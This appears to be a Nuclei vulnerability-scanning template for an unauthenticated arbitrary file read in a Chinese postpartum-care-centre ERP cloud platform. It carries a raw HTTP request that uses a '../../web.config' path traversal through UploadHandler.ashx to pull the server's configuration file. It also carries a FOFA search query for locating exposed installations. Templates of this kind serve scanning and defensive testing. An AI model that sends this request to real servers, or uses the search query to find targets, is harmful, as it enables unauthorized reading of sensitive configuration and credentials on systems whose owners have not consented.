http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - ASP.NET
            - <?xml version=
            - "200"
            - '"data":'
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /Page/upload/UploadHandler.ashx?url=../../web.config HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
id: yueziERP-UploadHandler_ashx-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="月子护理ERP管理平台" || body="妈妈宝盒客户端.rar" || body="Page/Login/Login3.aspx"
        月子会所ERP云管理平台 UploadHandler.ashx 接囗处存在任意文件读取漏洞,未经身份验证的远程攻击者通过漏洞可以获取到服务器敏感信息，导致系统处于极不安全的状态。
    name: 月子会所ERP云管理平台 UploadHandler.ashx 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s/kti50AoTPjyTUPR-ft4GUA
    severity: high
    tags:
        - File reading
        - asp.net
